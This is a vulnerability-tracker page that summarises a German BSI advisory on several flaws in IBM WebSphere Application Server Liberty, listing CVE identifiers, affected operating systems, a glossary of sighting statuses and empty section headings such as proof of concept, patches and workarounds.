Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung: IBM WebSphere Application Server ist ein J2EE-Applikationsserver.

Angriff: Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in IBM WebSphere Application Server Liberty ausnutzen, um seine Privilegien zu erhöhen, Sicherheitsmaßnahmen zu umgehen und Informationen offenzulegen.

Betroffene Betriebssysteme: - Linux - MacOS X - Sonstiges - UNIX - Windows

CVE-2025-14915

CVE-2025-14917

CVE-2026-1561

CVE-2026-29063

References

URL

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-29063 (GCVE-0-2026-29063)

CERTFR-2026-AVI-0372

Solutions

GHSA-WF6X-7X77-MVGW

Impact

Affected APIs

Patches

Workarounds

Proof of Concept

PoC 1 — mergeDeep privilege escalation

PoC 2 — All affected APIs

References

FKIE_CVE-2026-29063

WID-SEC-W-2026-0845

Tags

Sightings

Nomenclature